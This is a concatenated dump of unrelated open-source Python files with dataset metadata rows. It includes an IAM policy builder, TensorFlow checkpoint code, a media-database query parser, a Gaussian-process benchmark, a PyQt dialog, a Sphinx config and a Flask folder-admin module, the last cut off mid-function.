action = split_statement_action[1].replace(api_version,'')
else:
action = split_statement_action[1]
            else:
                action = split_statement_action[1]
        else:
            action = split_statement_action[1]
logging.debug(statement_action)
logging.debug(self.service_actions.get(service))
if self.service_actions.get(service) is None:
self.service_actions[service] = []
if not action in self.service_actions[service]:
self.service_actions[service].append(action)
logging.debug("Action added: {service}:{action}".format(service=service, action=action))
def __get_service_alias__(self, service):
service_aliases = {
"monitoring": "cloudwatch"
}
return service_aliases.get(service, service)
def __build_statements__(self):
for service in self.service_actions:
actions_per_service = []
for action in self.service_actions[service]:
actions_per_service.append(service+":"+action)
statement = IAMStatement( effect="Allow",
actions=actions_per_service,
resource="*",
sid='SecurityFairyBuilt{service}Policy'.format(service=service.capitalize())
)
self.__add_statement__(statement)
def get_policy(self):
self.__build_statements__()
built_policy_statements = []
for statement in self.statements:
built_policy_statements.append(statement.get_statement())
policy = {
"Version": "2012-10-17",
"Statement": built_policy_statements
}
logging.debug(policy)
return policy
def print_policy(self):
return json.dumps(self.get_policy())
class IAMStatement:
def __init__(self, effect, actions, resource, sid='', logging_level = logging.DEBUG):
logging.basicConfig(level=logging_level)
self.validate_statement(effect, actions, resource)
self.actions = actions
self.resource = resource
self.effect = effect
if sid != '':
self.sid = sid
def validate_statement(self, effect, actions, resource):
if not effect.lower() in ['allow', 'deny']:
logging.debug(effect)
raise InvalidStatementAction("Valid Effects are 'Allow' and 'Deny'.")
if not resource == '*':
logging.debug(resource)
raise Exception('Invalid Resource.')
logging.debug(actions)
for action in actions:
if len(action.split(':')) != 2:
raise InvalidStatementAction('Invalid Statement: {action} Statement must be \'service:api-action\'.'.format(action=action))
self.actions = actions
def get_statement(self):
if self.actions == []:
raise Exception('This statement has no Actions')
statement = {
"Effect": self.effect,
"Resource": self.resource,
"Action": self.actions
}
if self.sid != '':
statement['Sid'] = self.sid
return statement
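# Illustrative usage sketch (added; not part of Security Fairy). The action
# names below are examples only.
if __name__ == '__main__':
    example_policy = IAMPolicy()
    example_policy.add_actions(['s3:GetObject',
                                's3:PutObject',
                                'lambda:InvokeFunction'])
    print(example_policy.print_policy())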
| apache-2.0 | -6,934,768,332,968,634,000 | 37.105263 | 139 | 0.572612 | false |
khalido/nd101 | tf_save_check.py | 1 | 1112 | import tensorflow as tf
# The file path to save the data
save_file = './model.ckpt'
# Two Tensor Variables: weights and bias
weights = tf.Variable(tf.truncated_normal([2, 3]))
bias = tf.Variable(tf.truncated_normal([3]))
# Class used to save and/or restore Tensor Variables
saver = tf.train.Saver()
with tf.Session() as sess:
# Initialize all the Variables
sess.run(tf.global_variables_initializer())
# Show the values of weights and bias
print('Weights:')
print(sess.run(weights))
print('Bias:')
print(sess.run(bias))
# Save the model
saver.save(sess, save_file)
# Remove the previous weights and bias
tf.reset_default_graph()
# Two Variables: weights and bias
weights = tf.Variable(tf.truncated_normal([2, 3]))
bias = tf.Variable(tf.truncated_normal([3]))
# Class used to save and/or restore Tensor Variables
saver = tf.train.Saver()
with tf.Session() as sess:
# Load the weights and bias
saver.restore(sess, save_file)
# Show the values of weights and bias
print('Weight:')
print(sess.run(weights))
print('Bias:')
print(sess.run(bias)) | gpl-3.0 | 3,808,513,290,078,029,300 | 24.883721 | 52 | 0.690647 | false |
hakuya/higu | lib/hdbfs/query.py | 1 | 12573 | import calendar
import datetime
import hdbfs
import model
class TagConstraint:
def __init__( self, tag ):
self.__tag = tag
def to_db_constraint( self, db ):
if( isinstance( self.__tag, hdbfs.Obj ) ):
tag = self.__tag
elif( isinstance( self.__tag, int ) ):
tag = db.get_object_by_id( self.__tag )
else:
tag = db.get_tag( self.__tag )
return db.session.query( model.Relation.child_id ) \
.filter( model.Relation.parent_id == tag.obj.object_id )
class StringConstraint:
def __init__( self, s ):
self.__s = s
def to_db_constraint( self, db ):
if( len( self.__s ) == 0 ):
sql_s = '%'
else:
sql_s = self.__s.replace( '%', '[%]' ) \
.replace( '*', '%' )
if( sql_s[0] != '%' ):
sql_s = '%' + sql_s
if( sql_s[-1] != '%' ):
sql_s = sql_s + '%'
return db.session.query( model.Object.object_id ) \
.filter( model.Object.name.like( sql_s ) )
class UnboundConstraint:
def __init__( self, s ):
self.__s = s
def to_db_constraint( self, db ):
try:
c = TagConstraint( self.__s )
db_c = c.to_db_constraint( db )
if( db_c is not None ):
return db_c
except:
pass
c = StringConstraint( self.__s )
return c.to_db_constraint( db )
def QueryInt( v, ceil = False ):
try:
# Try as int
return int( v )
except ValueError:
# Try as date
if( '_' in v ):
date_str, time_str = v.split( '_' )
else:
date_str = v
time_str = None
date_str = v.split( '/' )
year = int( date_str[0] )
dmon = int( date_str[1] ) if( len( date_str ) >= 2 ) else 1
dday = int( date_str[2] ) if( len( date_str ) >= 3 ) else 1
if( len( date_str ) >= 4 ):
raise ValueError
if( time_str is not None and len( date_str ) >= 3 ):
time_str = time_str.split( ':' )
hour = int( time_str[0] ) if( len( time_str ) >= 1 ) else 0
tmin = int( time_str[1] ) if( len( time_str ) >= 2 ) else 0
tsec = int( time_str[2] ) if( len( time_str ) >= 3 ) else 0
if( len( time_str ) >= 4 ):
raise ValueError
else:
hour = 0
tmin = 0
tsec = 0
if( ceil ):
if( len( date_str ) == 1 ):
year += 1
elif( len( date_str ) == 2 ):
dmon += 1
elif( len( date_str ) == 3 ):
if( time_str is None or len( time_str ) == 0 ):
dday += 1
elif( len( time_str ) == 1 ):
hour += 1
elif( len( time_str ) == 2 ):
tmin += 1
elif( len( time_str ) == 3 ):
tsec += 1
dt = datetime.datetime( year, dmon, dday, hour, tmin, tsec )
dt = calendar.timegm( dt.timetuple() )
if( ceil ):
dt -= 1
return dt
class ObjIdConstraint:
def __init__( self, op, value ):
from sqlalchemy import and_
if( op == '=' ):
self.__constraint = (model.Object.object_id == int( value ))
elif( op == '!=' ):
self.__constraint = (model.Object.object_id != int( value ))
elif( op == '>' ):
self.__constraint = (model.Object.object_id > int( value ))
elif( op == '>=' ):
self.__constraint = (model.Object.object_id >= int( value ))
elif( op == '<' ):
self.__constraint = (model.Object.object_id < int( value ))
elif( op == '<=' ):
self.__constraint = (model.Object.object_id <= int( value ))
elif( op == '~' ):
if( '-' in value ):
lower, upper = map( int, value.split( '-' ) )
elif( '|' in value ):
value, vrange = map( int, value.split( '|' ) )
lower = value - vrange
upper = value + vrange
else:
lower = int( value )
upper = lower
if( lower != upper ):
self.__constraint = and_( model.Object.object_id >= lower,
model.Object.object_id <= upper )
else:
self.__constraint = (model.Object.object_id == lower)
else:
assert False
def to_db_constraint( self, db ):
return db.session.query( model.Object.object_id ) \
.filter( self.__constraint )
class ParameterConstraint:
def __init__( self, key, op, value ):
from sqlalchemy import and_
self.__key = key
if( op == '=' ):
self.__constraint = (model.ObjectMetadata.value == str( value ))
elif( op == '!=' ):
self.__constraint = (model.ObjectMetadata.value != str( value ))
elif( op == '>' ):
self.__constraint = (model.ObjectMetadata.numeric > QueryInt( value ))
elif( op == '>=' ):
self.__constraint = (model.ObjectMetadata.numeric >= QueryInt( value ))
elif( op == '<' ):
self.__constraint = (model.ObjectMetadata.numeric < QueryInt( value ))
elif( op == '<=' ):
self.__constraint = (model.ObjectMetadata.numeric <= QueryInt( value ))
elif( op == '~' ):
if( '-' in value ):
lower, upper = map( QueryInt, value.split( '-' ) )
elif( '|' in value ):
value, vrange = value.split( '|' )
lower = QueryInt( value, False ) - int( vrange )
upper = QueryInt( value, True ) + int( vrange )
else:
lower = QueryInt( value, False )
upper = QueryInt( value, True )
if( lower != upper ):
self.__constraint = and_( model.ObjectMetadata.numeric >= lower,
model.ObjectMetadata.numeric <= upper )
else:
self.__constraint = (model.ObjectMetadata.numeric == lower)
else:
assert False
def to_db_constraint( self, db ):
from sqlalchemy import and_
return db.session.query( model.ObjectMetadata.object_id ) \
.filter( and_( model.ObjectMetadata.key == self.__key, \
self.__constraint ) )
class Query:
def __init__( self ):
self.__obj_type = None
self.__order_by = 'rand'
self.__order_desc = False
self.__strict = False
self.__req_constraints = []
self.__or_constraints = []
self.__not_constraints = []
def set_strict( self ):
self.__strict = True
def set_type( self, obj_type ):
self.__obj_type = obj_type
def set_order( self, prop, desc = False ):
self.__order_by = prop
self.__order_desc = desc
def add_require_constraint( self, constraint ):
self.__req_constraints.append( constraint )
def add_or_constraint( self, constraint ):
self.__or_constraints.append( constraint )
def add_not_constraint( self, constraint ):
self.__not_constraints.append( constraint )
def set_constraints( self, req_c = [], or_c = [], not_c = [] ):
self.__req_constraints = list( req_c )
self.__or_constraints = list( or_c )
self.__not_constraints = list( not_c )
def execute( self, db ):
to_db_c = lambda c: c.to_db_constraint( db )
if( len( self.__or_constraints ) > 0 ):
add_q = map( to_db_c, self.__or_constraints )
add_q = add_q[0].union( *add_q[1:] )
else:
add_q = None
if( len( self.__not_constraints ) > 0 ):
sub_q = map( to_db_c, self.__not_constraints )
sub_q = sub_q[0].union( *sub_q[1:] )
else:
sub_q = None
if( len( self.__req_constraints ) > 0 ):
req_q = map( to_db_c, self.__req_constraints )
req_q = req_q[0].intersect( *req_q[1:] )
else:
req_q = None
query = db.session.query( model.Object )
if( req_q is not None ):
q = req_q
if( add_q is not None ):
q = q.union( add_q )
query = query.filter( model.Object.object_id.in_( q ) )
elif( add_q is not None ):
query = query.filter( model.Object.object_id.in_( add_q ) )
if( sub_q is not None ):
query = query.filter( ~model.Object.object_id.in_( sub_q ) )
if( self.__obj_type is not None ):
query = query.filter( model.Object.object_type == self.__obj_type )
else:
query = query.filter( model.Object.object_type.in_( [
hdbfs.TYPE_FILE, hdbfs.TYPE_ALBUM ] ) )
if( self.__order_by == 'rand' ):
query = query.order_by( 'RANDOM()' )
elif( self.__order_by == 'add' ):
if( not self.__order_desc ):
query = query.order_by( model.Object.object_id )
else:
query = query.order_by( model.Object.object_id.desc() )
elif( self.__order_by == 'name' ):
if( not self.__order_desc ):
query = query.order_by( model.Object.name,
model.Object.object_id )
else:
query = query.order_by( model.Object.name.desc(),
model.Object.object_id.desc() )
elif( self.__order_by == 'origin' ):
query = query.join( model.ObjectMetadata )\
.filter( model.ObjectMetadata.key == 'origin_time' )
if( not self.__order_desc ):
query = query.order_by( model.ObjectMetadata.numeric,
model.Object.object_id )
else:
query = query.order_by( model.ObjectMetadata.numeric.desc(),
model.Object.object_id.desc() )
return hdbfs.ModelObjToHiguObjIterator( db, query )
def create_constraint( s ):
if( s.startswith( '@' ) ):
return StringConstraint( s[1:] )
elif( s.startswith( '#' ) ):
return TagConstraint( s[1:] )
elif( s.startswith( '&' ) ):
ops = [ '>=', '<=', '>', '<', '!=', '=', '~' ]
s = s[1:]
for i in ops:
try:
idx = s.index( i[0] )
key = s[0:idx]
op = i
                value = s[idx+len(i):]
if( key == 'id' ):
return ObjIdConstraint( op, value )
else:
return ParameterConstraint( key, op, value )
except ValueError:
pass
else:
raise ValueError, 'Bad Parameter Constraint'
else:
return UnboundConstraint( s )
def build_query( s ):
query = Query()
clauses = s.split( ' ' )
clauses = [i for i in clauses if( len( i ) > 0 )]
commands = [i[1:] for i in clauses if( i[0] == '$' )]
add = [i[1:] for i in clauses if( i[0] == '?' )]
sub = [i[1:] for i in clauses if( i[0] == '!' )]
req = [i for i in clauses if( i[0] != '$' and i[0] != '?' and i[0] != '!' )]
for cmd in commands:
cmd = cmd.split( ':' )
if( cmd[0] == 'strict' ):
query.set_strict()
elif( cmd[0] == 'sort' ):
if( len( cmd ) < 2 ):
raise ValueError, 'Sort command needs an argument'
desc = False
if( len( cmd ) > 2 and cmd[2] == 'desc' ):
desc = True
query.set_order( cmd[1], desc )
elif( cmd[0] == 'type' ):
if( len( cmd ) < 2 ):
raise ValueError, 'Type command needs an argument'
if( cmd[1] == 'file' ):
query.set_type( hdbfs.TYPE_FILE );
elif( cmd[1] == 'album' ):
query.set_type( hdbfs.TYPE_ALBUM );
else:
raise ValueError, 'Bad type'
else:
raise ValueError, 'Bad Command'
req = map( create_constraint, req )
add = map( create_constraint, add )
sub = map( create_constraint, sub )
query.set_constraints( req, add, sub )
return query
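# Illustrative query strings (added as documentation; tag names and metadata
# keys below are examples only):
#
#   build_query( '#holiday ?beach !private $sort:name' )
#       require the 'holiday' tag, optionally match 'beach', exclude
#       'private', and order the results by name.
#   build_query( '&origin_time~2014/06 $type:file' )
#       files whose origin_time falls anywhere inside June 2014.
#   build_query( '@summer $sort:add:desc' )
#       objects whose name contains 'summer', newest first.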
| bsd-2-clause | -7,394,012,294,911,807,000 | 30.198511 | 83 | 0.459318 | false |
eloquence/unisubs | docs/conf.py | 1 | 6953 | # -*- coding: utf-8 -*-
#
# Amara documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 25 14:58:38 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
sys.path.insert(0, os.path.abspath('../'))
import startup
startup.startup()
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.httpdomain',
'sphinxcontrib.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Amara'
copyright = u'2012, Participatory Culture Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2.0'
# The full version, including alpha/beta/rc tags.
release = '1.2.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
autodoc_member_order = 'bysource'
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'UniversalSubtitlesdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'UniversalSubtitles.tex', u'Amara Documentation',
u'Participatory Culture Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'universalsubtitles', u'Amara Documentation',
[u'Participatory Culture Foundation'], 1)
]
| agpl-3.0 | -4,141,644,483,052,377,000 | 30.894495 | 80 | 0.709766 | false |
brguez/TEIBA | src/python/mergeVCF.py | 1 | 2384 | #!/usr/bin/env python
#coding: utf-8
#### FUNCTIONS ####
def header(string):
"""
Display header
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print '\n', timeInfo, "****", string, "****"
def subHeader(string):
"""
Display subheader
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print timeInfo, "**", string, "**"
def info(string):
"""
Display basic information
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print timeInfo, string
#### MAIN ####
## Import modules ##
import argparse
import sys
import os.path
import formats
import time
## Get user's input ##
parser = argparse.ArgumentParser(description="Merge multiple one-sample VCF files in a single one")
parser.add_argument('VCFPaths', help='text file with the path to the VCF files will be merged')
parser.add_argument('sampleId', help='Identifier to name output file.')
parser.add_argument('-o', '--outDir', default=os.getcwd(), dest='outDir', help='output directory. Default: current working directory.' )
args = parser.parse_args()
VCFPaths = args.VCFPaths
sampleId = args.sampleId
outDir = args.outDir
scriptName = os.path.basename(sys.argv[0])
## Display configuration to standard output ##
print
print "***** ", scriptName, " configuration *****"
print "VCF: ", VCFPaths
print "sampleId: ", sampleId
print "outDir: ", outDir
print
print "***** Executing ", scriptName, ".... *****"
print
## Start ##
#### 1. Create VCF object and read input VCF
header("1. Process input VCFs")
paths = open(VCFPaths, 'r')
# Make merged VCF object
completeVCFObj = formats.VCF()
## Read one VCF per iteration and add the variants to the merged VCF
for VCFfile in paths:
VCFfile = VCFfile.rstrip('\n\r')
VCFObj = formats.VCF()
VCFObj.read_VCF(VCFfile)
# Add variant objects
for lineObj in VCFObj.lineList:
completeVCFObj.addLine(lineObj)
# Create header
if completeVCFObj.header == "":
completeVCFObj.header = VCFObj.header
# Sort variants in the merged VCF object
completeVCFObj.lineList = completeVCFObj.sort()
#### Write output VCF file from merged VCF object
header("2. Write output VCF file")
outFilePath = outDir + '/' + sampleId + ".vcf"
# 1. Write header
completeVCFObj.write_header(outFilePath)
# 2. Write variants
completeVCFObj.write_variants(outFilePath)
header("Finished")
| gpl-3.0 | -8,237,825,818,623,232,000 | 22.544554 | 136 | 0.666526 | false |
jdavidrcamacho/Tests_GP | 08 - Thesis results/speed_test6.py | 1 | 5414 | import Gedi as gedi
import george
import numpy as np;
import matplotlib.pylab as pl; pl.close('all')
from time import time,sleep
import scipy.optimize as op
import sys
##### INITIAL DATA ###########################################################
nrep = 1
pontos=[]
temposQP=[]
temposmulti=[]
georgeQP=[]
sleeptime=10
lista=[10,20,50,100,200,500]
#for i in np.arange(100,650,200):
#for i in np.arange(100,1400,350):
### Functions george
# Define the objective function (negative log-likelihood in this case).
def nll(p):
# Update the kernel parameters and compute the likelihood.
gp.kernel[:] = p
ll = gp.lnlikelihood(y, quiet=True)
# The scipy optimizer doesn't play well with infinities.
return -ll if np.isfinite(ll) else 1e25
# And the gradient of the objective function.
def grad_nll(p):
# Update the kernel parameters and compute the likelihood.
gp.kernel[:] = p
return -gp.grad_lnlikelihood(y, quiet=True)
### Functions gedi
def nll_gedi(p):
global kernel
# Update the kernel parameters and compute the likelihood.
kernel= gedi.kernel_optimization.new_kernel(kernel,np.exp(p))
ll = gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
# The scipy optimizer doesn't play well with infinities.
return -ll if np.isfinite(ll) else 1e25
# And the gradient of the objective function.
def grad_nll_gedi(p):
global kernel
# Update the kernel parameters and compute the likelihood.
kernel= gedi.kernel_optimization.new_kernel(kernel,np.exp(p))
return -np.array(gedi.kernel_likelihood.gradient_likelihood(kernel,x,y,yerr))
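# Note (added for clarity): both objective pairs follow the same pattern --
# scipy.optimize works on the *log* of the hyperparameters, so nll_gedi /
# grad_nll_gedi rebuild the kernel from np.exp(p) on every call, while the
# george pair assigns the log-vector straight into gp.kernel[:].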
###############################################################################
### Things to run
for i0, i in enumerate(lista):
f=open("{0}.txt".format(i),"w")
sys.stdout = f
print i
pontos.append(i)
print 'pontos', pontos
x = 10 * np.sort(np.random.rand(2*i))
yerr = 0.2 * np.ones_like(x)
y = np.sin(x) + yerr * np.random.randn(len(x))
av = []
for _ in range(nrep):
start= time()
kernel= gedi.kernel.QuasiPeriodic(15.0,2.0,1.0,10.0)
print 'Initial gedi kernel =',kernel
print 'Initial gedi likelihood =',gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
# Run the optimization routine.
p0_gedi = np.log(kernel.pars)
results_gedi = op.minimize(nll_gedi, p0_gedi, jac=grad_nll_gedi)
kernel= gedi.kernel_optimization.new_kernel(kernel,np.exp(results_gedi.x))
print 'Final gedi kernel =',kernel
print 'Final gedi likelihood =',gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
print
tempo1= time() - start
av.append(tempo1)
temposQP.append(sum(av) / float(nrep))
print 'temposQP', temposQP
sleep(sleeptime*i0)
###############################################################################
av = []
for _ in range(nrep):
start= time()
kernel= gedi.kernel.ExpSineSquared(15.0, 2.0, 10.0)* \
gedi.kernel.ExpSquared(1.0,1.0)
print 'Initial gedi kernel =',kernel
print 'Initial gedi likelihood =',gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
# Run the optimization routine.
p0_gedi = np.log(kernel.pars)
results_gedi = op.minimize(nll_gedi, p0_gedi, jac=grad_nll_gedi)
kernel= gedi.kernel_optimization.new_kernel(kernel,np.exp(results_gedi.x))
print 'Final gedi kernel =',kernel
print 'Final gedi likelihood =',gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
print
tempo1= time() - start
av.append(tempo1)
temposmulti.append(sum(av) / float(nrep))
print 'temposmult', temposmulti
sleep(sleeptime*i0)
av = []
for _ in range(nrep):
start = time() # Calculation using george
kernelg1 = 15.0**2*george.kernels.ExpSine2Kernel(2/2.0**2,10.0)* \
george.kernels.ExpSquaredKernel(1.0**2)
# You need to compute the GP once before starting the optimization.
gp = george.GP(kernelg1, mean=np.mean(y))
gp.compute(x,yerr)
# Print the initial ln-likelihood.
print 'Initial george kernel', kernelg1
print 'Initial george likelihood', gp.lnlikelihood(y)
# Run the optimization routine.
p0 = gp.kernel.vector
results = op.minimize(nll, p0, jac=grad_nll)
# Update the kernel and print the final log-likelihood.
gp.kernel[:] = results.x
print 'Final george kernel =',gp.kernel
print 'Final george likelihood= ', gp.lnlikelihood(y)
print
tempog1= time() - start
av.append(tempog1)
georgeQP.append(sum(av) / float(nrep))
print 'georgeQP', georgeQP
###########################################################################
sys.stdout = sys.__stdout__
f.close()
sleep(sleeptime*i0)
N = pontos
pl.figure()
pl.loglog(N, temposQP, 'r-')
pl.loglog(N, temposmulti, 'b-o')
pl.loglog(N, georgeQP, 'b--')
pl.xlim(0.9*N[0], 1.1*N[-1])
pl.xlabel('Number of points')
pl.ylabel('Time')
#pl.title('Covariance matrix calculations')
pl.legend(['gedi QP', 'gedi ESS*ES','george ESS*ES'],loc='upper left')
pl.xticks(fontsize = 18);pl.yticks(fontsize=18)
pl.savefig('speedtest_6.png')
#pl.close('all') | mit | -2,779,067,002,796,960,300 | 32.84375 | 92 | 0.598079 | false |
ArtBIT/Droptopus | droptopus/forms.py | 1 | 3409 | import os
import logging
from droptopus import config, settings
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (
QDialog,
QDialogButtonBox,
QFileDialog,
QFormLayout,
QHBoxLayout,
QLabel,
QLineEdit,
QMessageBox,
QPushButton,
)
from PyQt5.QtGui import QPixmap
class EditItemForm(QDialog):
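    # Sketch of the mapping this dialog expects as ``item`` (inferred from the
    # attribute accesses below; the keys are real, the sample values are invented):
    #   {'name': 'My action', 'desc': 'Short description', 'icon': '/path/to/icon.png',
    #    'path': '/target/path', 'type': 'dir'}   # any other 'type' is treated as a file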
def __init__(self, item, parent=None):
super(EditItemForm, self).__init__(parent)
l1 = QLabel("Name:")
name = QLineEdit()
l2 = QLabel("Description:")
desc = QLineEdit()
l3 = QLabel("Icon:")
icon = QLabel()
btn_icon = QPushButton("...")
btn_icon.setFixedWidth(50)
btn_icon.clicked.connect(self.onChangeIcon)
l4 = QLabel("Target Path:")
path = QLineEdit()
path.setReadOnly(True)
btn_path = QPushButton("...")
btn_path.setFixedWidth(50)
btn_path.clicked.connect(self.onChangePath)
layout = QFormLayout(self)
layout.addRow(l1, name)
layout.addRow(l2, desc)
row = QHBoxLayout()
row.addWidget(icon)
row.addWidget(btn_icon)
layout.addRow(l3, row)
row = QHBoxLayout()
row.addWidget(path)
row.addWidget(btn_path)
layout.addRow(l4, row)
buttons = QDialogButtonBox(
QDialogButtonBox.Ok | QDialogButtonBox.Cancel, Qt.Horizontal, self
)
buttons.accepted.connect(self.accept)
buttons.rejected.connect(self.reject)
layout.addRow(buttons)
self.icon = icon
self.name = name
self.path = path
self.desc = desc
self.loadItem(item)
def loadItem(self, item):
self.icon.setPixmap(
QPixmap(item["icon"]).scaled(
50, 50, Qt.KeepAspectRatio, Qt.SmoothTransformation
)
)
self.name.setText(item["name"])
self.desc.setText(item["desc"])
self.path.setText(item["path"])
self.item = item
def onChangeIcon(self):
icon_filepath, _filter = QFileDialog.getOpenFileName(
self, "Choose Icon", os.path.dirname(self.item["icon"])
)
if icon_filepath:
icon_size = 15
self.icon.setPixmap(
QPixmap(icon_filepath).scaled(
icon_size, icon_size, Qt.KeepAspectRatio, Qt.SmoothTransformation
)
)
self.item["icon"] = icon_filepath
def onChangePath(self):
path = self.item["path"] if len(self.item["path"]) else os.path.expanduser("~")
if self.item["type"] == "dir":
path = QFileDialog.getExistingDirectory(self, "Choose a directory", path)
if path:
self.path.setText(path)
self.item["path"] = path
else:
path, _filter = QFileDialog.getOpenFileName(self, "Open file", path)
if path:
self.path.setText(path)
self.item["path"] = path
    def validate(self):
        # Nothing is validated yet; keep the error list defined so accept() can
        # join self.validation_errors safely if validation ever fails.
        self.validation_errors = []
        return True
def accept(self):
if not self.validate():
QMessageBox.critical(
self, "Error", "\n".join(self.validation_errors), QMessageBox.Ok
)
return
self.item["name"] = self.name.text()
self.item["desc"] = self.desc.text()
settings.writeItem(self.item)
self.close()
| mit | -2,698,943,702,042,871,000 | 27.889831 | 87 | 0.563802 | false |
nwokeo/supysonic | supysonic/frontend/folder.py | 1 | 3211 | # coding: utf-8
# This file is part of Supysonic.
#
# Supysonic is a Python implementation of the Subsonic server API.
# Copyright (C) 2013 Alban 'spl0k' Féron
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from flask import request, flash, render_template, redirect, url_for, session
import os.path
import uuid
from supysonic.web import app, store
from supysonic.db import Folder
from supysonic.scanner import Scanner
from supysonic.managers.user import UserManager
from supysonic.managers.folder import FolderManager
@app.before_request
def check_admin():
if not request.path.startswith('/folder'):
return
if not UserManager.get(store, session.get('userid'))[1].admin:
return redirect(url_for('index'))
@app.route('/folder')
def folder_index():
return render_template('folders.html', folders = store.find(Folder, Folder.root == True))
@app.route('/folder/add', methods = [ 'GET', 'POST' ])
def add_folder():
if request.method == 'GET':
return render_template('addfolder.html')
error = False
(name, path) = map(request.form.get, [ 'name', 'path' ])
if name in (None, ''):
flash('The name is required.')
error = True
if path in (None, ''):
flash('The path is required.')
error = True
if error:
return render_template('addfolder.html')
ret = FolderManager.add(store, name, path)
if ret != FolderManager.SUCCESS:
flash(FolderManager.error_str(ret))
return render_template('addfolder.html')
flash("Folder '%s' created. You should now run a scan" % name)
return redirect(url_for('folder_index'))
@app.route('/folder/del/<id>')
def del_folder(id):
try:
idid = uuid.UUID(id)
except ValueError:
flash('Invalid folder id')
return redirect(url_for('folder_index'))
ret = FolderManager.delete(store, idid)
if ret != FolderManager.SUCCESS:
flash(FolderManager.error_str(ret))
else:
flash('Deleted folder')
return redirect(url_for('folder_index'))
@app.route('/folder/scan')
@app.route('/folder/scan/<id>')
def scan_folder(id = None):
scanner = Scanner(store)
if id is None:
for folder in store.find(Folder, Folder.root == True):
